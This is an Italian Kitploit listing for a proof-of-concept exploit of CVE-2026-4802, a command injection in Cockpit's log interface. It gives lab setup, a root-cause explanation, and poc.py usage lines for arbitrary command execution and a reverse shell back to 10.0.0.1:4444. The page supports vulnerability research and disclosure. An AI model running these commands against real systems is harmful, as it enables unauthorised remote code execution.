Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-4802 — Proof-of-concept exploit per CVE-2026-4802, una vulnerabilità di command injection nell'interfaccia dei log di sistema di Cockpit, che consente l'esecuzione arbitraria di comandi e reverse shell. | Kitploit
Strumenti/GitHubGitHub/hakaioffsec/cve-2026-4802
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubhakaioffsec/cve-2026-4802

CVE-2026-4802

Proof-of-concept exploit per CVE-2026-4802, una vulnerabilità di command injection nell'interfaccia dei log di sistema di Cockpit, che consente l'esecuzione arbitraria di comandi e reverse shell.

Vedi Repository
413 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-4802 - Esecuzione di codice remoto tramite iniezione di comandi in Cockpit

Una proof-of-concept per CVE-2026-4802, un'esecuzione di codice remoto tramite iniezione di comandi nell'interfaccia dei log di sistema di Cockpit (loadServiceFilters())

Setup

Crea ed esegui l'ambiente vulnerabile:

root@kitploit:~
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln

Utilizzo

root@kitploit:~
# Verifica se il target è vulnerabile
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check

# Esegui comandi arbitrari
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"

# Reverse shell
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444

Versioni Vulnerabili

  • Cockpit (versioni non patchate con pkg/systemd/logsJournal.jsx)

Causa Principale

La funzione loadServiceFilters() in pkg/systemd/logsJournal.jsx costruisce comandi shell unendo array in stringhe con solo l'escape degli spazi prima di passarli a /bin/bash -ec. I parametri controllati dall'utente dal frammento URL della pagina dei log (es. --since=) raggiungono questo percorso di codice senza essere sanificati, consentendo l'iniezione di metacaratteri shell come la sostituzione di comandi ($(...)).

Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e di ricerca. Utilizzalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testare. L'autore non è responsabile di alcun uso improprio o danno causato da questo programma.

QuimeraX Intelligence

QuimeraX Intelligence è una piattaforma avanzata di EASM e Cyber Threat Intelligence specializzata nell'identificazione di vulnerabilità critiche in sistemi complessi. La piattaforma monitora, rileva e segnala proattivamente le minacce alla sicurezza ai clienti, garantendo trasparenza e risposta rapida ai potenziali rischi. I clienti ricevono notifiche immediate e report completi se i loro sistemi risultano vulnerabili, consentendo loro di adottare misure protettive. scopri di più

Hakai Security

Hakai Security è un'azienda di cybersecurity fondata da professionisti della sicurezza, impegnata nell'eccellenza tecnica. Offriamo soluzioni di sicurezza su misura, tra cui penetration testing avanzato, simulazioni realistiche di Red Team e pratiche di sviluppo sicuro per proteggere proattivamente gli asset dei nostri clienti dalle minacce informatiche in evoluzione.

Riferimenti

  • https://bugzilla.redhat.com/show_bug.cgi?id=2451155
  • https://access.redhat.com/security/cve/CVE-2026-4802
  • https://www.cve.org/CVERecord?id=CVE-2026-4802
Scarica lo strumento